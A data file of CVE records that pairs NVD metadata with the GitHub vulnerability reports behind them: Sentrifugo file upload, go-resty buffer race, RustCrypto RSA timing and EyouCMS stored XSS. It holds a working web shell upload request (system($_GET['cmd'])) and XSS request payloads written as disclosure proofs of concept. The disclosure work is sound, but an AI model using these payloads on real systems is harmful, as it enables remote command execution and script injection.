# Bug: Authenticated - Unrestricted file upload ## Description The `AssetsController::uploadsaveAction` function allows an authenticated attacker to upload any file without extension filtering. ## Vulnerability Detail The `uploadsaveAction` function allows an attacker to take full control of the extension and save it to `ASSETS_IMAGES_TEMP_PATH` ```php /* /application/modules/assets/controllers/AssetsController.php */ public function uploadsaveAction() { $assetsModel = new Assets_Model_Assets(); $user_id = sapp_Global::_readSession('id'); $image; $filedata = array(); // Validate file with size greater than default(Upload Max Filesize)limit if ($_FILES["myfile"]["size"] == 0 || $_FILES["myfile"]["size"] > (2*1024*1024)) { $this->_helper->json(array('error' => 'filesize')); } else if(isset($_FILES["myfile"])) { $fileName = $_FILES["myfile"]["name"]; $image = $fileName; $fileName = preg_replace('/[^a-zA-Z0-9.\']/', '_', $fileName); $newName = time().'_'.$user_id.'_'.str_replace(' ', '_', $fileName); $filedata['original_name'] = $fileName; $filedata['new_name'] = $newName; $file_type_array = explode('.',$filedata['original_name']); $file_type = $file_type_array[1]; move_uploaded_file($_FILES["myfile"]["tmp_name"],ASSETS_IMAGES_TEMP_PATH.$newName); ... ``` ## Proof of concept REQUEST: ``` POST /sentrifugo/index.php/assets/assets/uploadsave HTTP/2 Host: localhost:8888 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0 Cookie: PHPSESSID=4c6885df75ee21adc859130d344ad10e Content-Type: multipart/form-data; boundary=---------------------------105724483522942151783772139738 Content-Length: 256 -----------------------------105724483522942151783772139738 Content-Disposition: form-data; name="myfile"; filename="shell.php" Content-Type: image/jpeg <?php system($_GET["cmd"]); ?> -----------------------------105724483522942151783772139738-- ``` RESPONSE: ``` HTTP/1.1 200 OK Date: Wed, 08 Mar 2023 06:41:21 GMT Server: Apache/2.2.29 (Unix) mod_wsgi/3.5 Python/2.7.10 PHP/5.6.10 mod_ssl/2.2.29 OpenSSL/0.9.8zh DAV/2 mod_fastcgi/2.4.6 mod_perl/2.0.9 Perl/v5.22.0 X-Powered-By: PHP/5.6.10 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 78 Connection: close Content-Type: text/html;charset=UTF-8 {"filedata":{"original_name":"shell.php","new_name":"1678257682_1_shell.php"}} ``` ![image-20230308134229160](https://user-images.githubusercontent.com/44127534/223641245-2f675c96-9dcc-443f-aede-8519ead8ff6a.png) ![image-20230308134249938](https://user-images.githubusercontent.com/44127534/223641333-12223a68-fafa-4238-a3bb-ccfbf8f5377d.png) ## Solution - Validate file type: Ensure that the uploaded file matches the expected file type and size limit. This can be done by checking the file extension or using a file type validation library. - Sanitize file names: Ensure that the file names are sanitized to prevent directory traversal attacks. This involves removing any special characters, whitespace, and other potentially harmful characters. - Store files outside the webroot: Store uploaded files outside of the web application's root directory to prevent them from being executed as scripts.. - Implement access controls: Implement access controls to ensure that only authorized users can upload files. This can include requiring authentication, setting permissions, and limiting upload privileges. ## Acknowledgement nhienit at bl4ckh0l3 from Galaxy One
Authenticated - Unrestricted file upload
https://api.github.com/repos/sapplica/sentrifugo/issues/384/comments
0
2023-03-08T06:58:49Z
2023-03-08T07:32:24Z
https://github.com/sapplica/sentrifugo/issues/384
1,614,753,704
384
5,773
CVE-2023-45286
2023-11-28T17:15:08.280
A race condition in go-resty can result in HTTP request body disclosure across requests. This condition can be triggered by calling sync.Pool.Put with the same *bytes.Buffer more than once, when request retries are enabled and a retry occurs. The call to sync.Pool.Get will then return a bytes.Buffer that hasn't had bytes.Buffer.Reset called on it. This dirty buffer will contain the HTTP request body from an unrelated request, and go-resty will append the current HTTP request body to it, sending two bodies in one request. The sync.Pool in question is defined at package level scope, so a completely unrelated server could receive the request body.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security@golang.org", "tags": null, "url": "https://github.com/go-resty/resty/commit/577fed8730d79f583eb48dfc81674164e1fc471e" }, { "source": "security@golang.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/go-resty/resty/issues/739" }, { "source": "security@golang.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/go-resty/resty/issues/743" }, { "source": "security@golang.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/go-resty/resty/pull/745" }, { "source": "security@golang.org", "tags": [ "Vendor Advisory" ], "url": "https://pkg.go.dev/vuln/GO-2023-2328" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/go-resty/resty/commit/577fed8730d79f583eb48dfc81674164e1fc471e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/go-resty/resty/issues/739" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/go-resty/resty/issues/743" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/go-resty/resty/pull/745" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://pkg.go.dev/vuln/GO-2023-2328" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:resty_project:resty:*:*:*:*:*:go:*:*", "matchCriteriaId": "433974E8-CB64-4BBB-BB5A-9F072275B86F", "versionEndExcluding": null, "versionEndIncluding": "2.10.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "362" ]
362
https://github.com/go-resty/resty/issues/739
[ "Exploit", "Issue Tracking" ]
github.com
[ "go-resty", "resty" ]
We detected a data race in resty's middleware when releasing/resetting the buffer. Please check. Go Version: 1.21.1 Resty Version: v2.10.0 ``` ================== WARNING: DATA RACE Read at 0x00c001e91ce0 by goroutine 537694: bytes.(*Buffer).Reset() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/bytes/buffer.go:107 +0x46 github.com/go-resty/resty/v2.releaseBuffer() /testDirectory/vendor/github.com/go-resty/resty/v2/util.go:298 +0x41 github.com/go-resty/resty/v2.handleRequestBody() /testDirectory/vendor/github.com/go-resty/resty/v2/middleware.go:484 +0x6e github.com/go-resty/resty/v2.parseRequestBody() /testDirectory/vendor/github.com/go-resty/resty/v2/middleware.go:193 +0x290 github.com/go-resty/resty/v2.(*Client).execute() /testDirectory/vendor/github.com/go-resty/resty/v2/client.go:1164 +0x550 github.com/go-resty/resty/v2.(*Request).Execute.func2() /testDirectory/vendor/github.com/go-resty/resty/v2/request.go:947 +0x179 github.com/go-resty/resty/v2.Backoff() /testDirectory/vendor/github.com/go-resty/resty/v2/retry.go:115 +0x1d5 github.com/go-resty/resty/v2.(*Request).Execute() /testDirectory/vendor/github.com/go-resty/resty/v2/request.go:941 +0xac4 github.com/go-resty/resty/v2.(*Request).Post() /testDirectory/vendor/github.com/go-resty/resty/v2/request.go:862 +0x344 github.wdf.sap.corp/ift/sl-core/pkg/slp/client.sumHandler.sendUserInput() /testDirectory/vendor/github.wdf.sap.corp/ift/sl-core/pkg/slp/client/sum_handler.go:69 +0x2cf github.wdf.sap.corp/ift/sl-core/pkg/slp/client.(*sumHandler).sendUserInput() <autogenerated>:1 +0x84 github.wdf.sap.corp/ift/sl-core/pkg/slp/client.(*Client).SendUserInput() /testDirectory/vendor/github.wdf.sap.corp/ift/sl-core/pkg/slp/client/slp_client.go:536 +0x119e github.wdf.sap.corp/ift/slocon/pkg/task/slpclient.FinishedResponse.evaluate() /testDirectory/pkg/task/slpclient/onstatefinished.go:160 +0x10a2 github.wdf.sap.corp/ift/slocon/pkg/task/slpclient.(*dialogHandler).evaluateResponses() /testDirectory/pkg/task/slpclient/dialogHandler.go:685 +0x977 github.wdf.sap.corp/ift/slocon/pkg/task/slpclient.(*dialogHandler).onMessagebox() /testDirectory/pkg/task/slpclient/dialogHandler.go:615 +0x3cb github.wdf.sap.corp/ift/slocon/pkg/task/slpclient.(*dialogHandler).OnStateDialog() /testDirectory/pkg/task/slpclient/dialogHandler.go:592 +0x2cd github.wdf.sap.corp/ift/sl-core/pkg/slp/client.(*Loop).Poll() /testDirectory/vendor/github.wdf.sap.corp/ift/sl-core/pkg/slp/client/loop.go:319 +0x1f85 github.wdf.sap.corp/ift/sl-core/pkg/slp/client.(*Loop).Run.func1() /testDirectory/vendor/github.wdf.sap.corp/ift/sl-core/pkg/slp/client/loop.go:191 +0x107 Previous write at 0x00c001e91ce0 by goroutine 537693: bytes.(*Buffer).Reset() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/bytes/buffer.go:107 +0x50 github.com/go-resty/resty/v2.releaseBuffer() /testDirectory/vendor/github.com/go-resty/resty/v2/util.go:298 +0x41 github.com/go-resty/resty/v2.(*requestBodyReleaser).Close.func1() /testDirectory/vendor/github.com/go-resty/resty/v2/util.go:325 +0x45 sync.(*Once).doSlow() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/sync/once.go:74 +0xf0 sync.(*Once).Do() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/sync/once.go:65 +0x44 github.com/go-resty/resty/v2.(*requestBodyReleaser).Close() /testDirectory/vendor/github.com/go-resty/resty/v2/util.go:324 +0x7d net/http.(*readTrackingBody).Close() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/net/http/transport.go:658 +0x4f net/http.(*transferWriter).writeBody.func1() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/net/http/transfer.go:343 +0x9a runtime.deferreturn() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/runtime/panic.go:477 +0x30 net/http.(*Request).write() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/net/http/request.go:738 +0x12cc net/http.(*persistConn).writeLoop() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/net/http/transport.go:2424 +0x312 net/http.(*Transport).dialConn.func6() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/net/http/transport.go:1777 +0x33 Goroutine 537694 (running) created at: github.wdf.sap.corp/ift/sl-core/pkg/slp/client.(*Loop).Run() /testDirectory/vendor/github.wdf.sap.corp/ift/sl-core/pkg/slp/client/loop.go:173 +0x164 github.wdf.sap.corp/ift/slocon/pkg/task/slpclient.slpClientClass.Run() /testDirectory/pkg/task/slpclient/slpclient.go:163 +0x970 github.wdf.sap.corp/ift/slocon/pkg/task/slpclient.(*slpClientClass).Run() <autogenerated>:1 +0x95 github.wdf.sap.corp/ift/slocon/pkg/task.(*Task).start.func3() /testDirectory/pkg/task/task.go:595 +0x1d4 Goroutine 537693 (finished) created at: net/http.(*Transport).dialConn() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/net/http/transport.go:1777 +0x256a net/http.(*Transport).dialConnFor() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/net/http/transport.go:1467 +0x129 net/http.(*Transport).queueForDial.func1() /home/fwkadmin/.ift/import/content/go-1.21.1-bin-linuxx86_64/go/src/net/http/transport.go:1436 +0x44 ================== ```
DATA RACE in resty's middleware (go-resty/resty/v2.releaseBuffer())
https://api.github.com/repos/go-resty/resty/issues/739/comments
2
2023-10-25T13:29:37Z
2024-01-11T10:14:09Z
https://github.com/go-resty/resty/issues/739
1,961,435,191
739
5,774
CVE-2023-45286
2023-11-28T17:15:08.280
A race condition in go-resty can result in HTTP request body disclosure across requests. This condition can be triggered by calling sync.Pool.Put with the same *bytes.Buffer more than once, when request retries are enabled and a retry occurs. The call to sync.Pool.Get will then return a bytes.Buffer that hasn't had bytes.Buffer.Reset called on it. This dirty buffer will contain the HTTP request body from an unrelated request, and go-resty will append the current HTTP request body to it, sending two bodies in one request. The sync.Pool in question is defined at package level scope, so a completely unrelated server could receive the request body.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security@golang.org", "tags": null, "url": "https://github.com/go-resty/resty/commit/577fed8730d79f583eb48dfc81674164e1fc471e" }, { "source": "security@golang.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/go-resty/resty/issues/739" }, { "source": "security@golang.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/go-resty/resty/issues/743" }, { "source": "security@golang.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/go-resty/resty/pull/745" }, { "source": "security@golang.org", "tags": [ "Vendor Advisory" ], "url": "https://pkg.go.dev/vuln/GO-2023-2328" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/go-resty/resty/commit/577fed8730d79f583eb48dfc81674164e1fc471e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/go-resty/resty/issues/739" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/go-resty/resty/issues/743" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/go-resty/resty/pull/745" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://pkg.go.dev/vuln/GO-2023-2328" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:resty_project:resty:*:*:*:*:*:go:*:*", "matchCriteriaId": "433974E8-CB64-4BBB-BB5A-9F072275B86F", "versionEndExcluding": null, "versionEndIncluding": "2.10.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "362" ]
362
https://github.com/go-resty/resty/issues/743
[ "Issue Tracking" ]
github.com
[ "go-resty", "resty" ]
In v2.10.0, I've observed an issue where the request body passed to `.SetBody(...)` is intermittently written multiple times under certain conditions. From what I gather, it is somehow related to the retry mechanism, or at the very least I was only able to reproduce by triggering that. [In the repro here](https://github.com/patrikeh/resty-request-body-issue), I ping an httptest mock endpoint triggering the retry mechanism, and observe the JSON request body being written multiple consecutive times e.g.
 ``` { <some-json> }{ <some-json> } ``` This issue does not occur in v2.9.1.
Request body is written multiple times
https://api.github.com/repos/go-resty/resty/issues/743/comments
2
2023-10-30T10:41:32Z
2023-12-27T05:37:48Z
https://github.com/go-resty/resty/issues/743
1,968,036,476
743
5,775
CVE-2023-49092
2023-11-28T21:15:08.530
RustCrypto/RSA is a portable RSA implementation in pure Rust. Due to a non-constant-time implementation, information about the private key is leaked through timing information which is observable over the network. An attacker may be able to use that information to recover the key. There is currently no fix available. As a workaround, avoid using the RSA crate in settings where attackers are able to observe timing information, e.g. local use on a non-compromised computer.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/RustCrypto/RSA/issues/19#issuecomment-1822995643" }, { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/RustCrypto/RSA/security/advisories/GHSA-c38w-74pg-36hr" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/RustCrypto/RSA/issues/19#issuecomment-1822995643" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/RustCrypto/RSA/security/advisories/GHSA-c38w-74pg-36hr" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rustcrypto:rsa:*:*:*:*:*:rust:*:*", "matchCriteriaId": "248AAFCD-E795-48F3-AC41-468B1E2EB267", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/RustCrypto/RSA/issues/19#issuecomment-1822995643
[ "Issue Tracking" ]
github.com
[ "RustCrypto", "RSA" ]
Hi there, I'm the author of sidefuzz (https://github.com/phayes/sidefuzz) and I have found what appears to be variable-time behavior in the `rsa::internals::encrypt()` function. Specifically, `rsa::internals::encrypt()` appears to be variable-time in relation to the message. Note that I haven't worked this up into an actual exploit, but merely demonstrated that this function isn't constant-time in relation to the message inputed. Specifically, the message `20d90c8af42aac9b1ee53dc9a0187201` takes 549894 instructions to encrypt, while the message `5a28cec68d47f6fe3b1df54c9f320f6d` takes 552427 instruction to encrypt. This is a difference of 2533 instructions, or about 0.5%. So it's a slight difference, but probably exploitable with sufficient sampling. I have crated a fuzzing targets here: https://github.com/phayes/sidefuzz-targets You can confirm this difference with the [sidefuzz](https://github.com/phayes/sidefuzz) tool like so: ``` sidefuzz check ./target/wasm32-unknown-unknown/release/rsa_encrypt_message.wasm 5a28cec68d47f6fe3b1df54c9f320f6d 20d90c8af42aac9b1ee53dc9a0187201 samples: 20000, t-value: 219771.0790572351, confidence: 100% Found timing difference of 2533 instructions between these two inputs with 100% confidence: input 1: 5a28cec68d47f6fe3b1df54c9f320f6d (552427 instructions) input 2: 20d90c8af42aac9b1ee53dc9a0187201 (549894 instructions) ``` My first suspicion was that this was due to `num_bigint_dig::BigUint::from_bytes_be()` being variable-time, but fuzzing that function specifically results in what appears to be constant-time behavior. So I'm not actually sure where the problem is.
modpow implementation is not constant-time
https://api.github.com/repos/RustCrypto/RSA/issues/19/comments
81
2019-04-30T19:50:46Z
2025-06-02T13:45:17Z
https://github.com/RustCrypto/RSA/issues/19
438,948,363
19
5,776
CVE-2023-48880
2023-11-29T16:15:07.167
A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Menu Name field at /login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/52" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E52879A-3ABB-441B-B6A9-A91E6C700778", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/52
[ "Exploit", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
**Version**: <=EyouCMS-V1.6.4-UTF8-SP1 ![20230823184917](https://github.com/weng-xianhu/eyoucms/assets/72898290/36522963-664f-4ac1-a291-e68a2952124b) **Description**: 1. Login to the back-end with an administrator account, click "Member Center", select "Function Configuration", then find "Frontend Style Settings", select "PC Left Menu", click "Manage" button, and modify the menu name. ![20230823185734](https://github.com/weng-xianhu/eyoucms/assets/72898290/29cbf8b2-da23-40d1-baae-34a2e6bf80cf) ![20230823185833](https://github.com/weng-xianhu/eyoucms/assets/72898290/9da23ac2-43ba-40a1-9e3f-adb652fd5043) ``` POST /EyouCMS/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1 Host: 192.168.3.135 Content-Length: 94 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.3.135 Referer: http://192.168.3.135/EyouCMS/login.php?m=admin&c=Member&a=ajax_menu_index&lang=cn Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=1mvmqpf2r3tteku8fbf3bu1to6; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=users_index%7CMember Connection: close table=users_menu&id_name=id&id_value=11&field=title&value=<img src=1 onerror=alert(1)> ``` 3. Register an account in the front-end and log in, click on "Avatar" and select "Personal Center", then a pop-up window will appear. ![20230823190732](https://github.com/weng-xianhu/eyoucms/assets/72898290/9d533863-e90b-4056-9493-b72664091ce8)
EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/52/comments
1
2023-08-23T11:20:28Z
2024-03-22T06:45:21Z
https://github.com/weng-xianhu/eyoucms/issues/52
1,863,129,078
52
5,777
CVE-2023-48881
2023-11-29T16:15:07.217
A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Field Title field at /login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/53" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E52879A-3ABB-441B-B6A9-A91E6C700778", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/53
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
**Version**: <=EyouCMS-V1.6.4-UTF8-SP1 ![20230823184917](https://github.com/weng-xianhu/eyoucms/assets/72898290/4c14b7a3-5445-460e-a5da-2ad47ccecff6) **Description**: 1. Log in to the backend with an administrator account, click on "Feature Map" and add "Column Fields". ![20230823203513](https://github.com/weng-xianhu/eyoucms/assets/72898290/9fcc7634-5fa9-4b6c-8504-3bbd70ebe494) 2. Select "Column Fields", click "Add Field", set the value of "Field Title" to `<img src=1 onerror=alert(1)>`, and fill in the other fields arbitrarily. ![20230823204835](https://github.com/weng-xianhu/eyoucms/assets/72898290/4cd7b7d9-316f-4877-829a-e1acdbc4b28d) ``` POST /EyouCMS/login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn HTTP/1.1 Host: 192.168.3.135 Content-Length: 131 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.3.135 Referer: http://192.168.3.135/EyouCMS/login.php?m=admin&c=Field&a=arctype_add&lang=cn Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=1mvmqpf2r3tteku8fbf3bu1to6; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; users_id=1; admin-arctreeClicked-Arr=%5B%5D; ENV_GOBACK_URL=%2FEyouCMS%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2FEyouCMS%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-treeClicked-Arr=%5B%5D; workspaceParam=arctype_index%7CField Connection: close title=<img src=1 onerror=alert(1)>&name=aaaaaaaa&dtype=text&dfvalue=aaaaaa&remark=aaaaaaaaaa&typeids%5B%5D=8&channel_id=-99 ``` 3. Then select "Column Fields" and a pop-up window will appear. ![20230823205325](https://github.com/weng-xianhu/eyoucms/assets/72898290/1a0b44e8-a8cd-40ca-9500-670fafd58d56)
EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/53/comments
1
2023-08-23T13:24:48Z
2024-03-22T06:39:31Z
https://github.com/weng-xianhu/eyoucms/issues/53
1,863,334,194
53
5,778
CVE-2023-48882
2023-11-29T16:15:07.270
A stored cross-site scripting (XSS) vulnerability in EyouCMS v1.6.4-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Document Properties field at /login.php m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/54" } ]
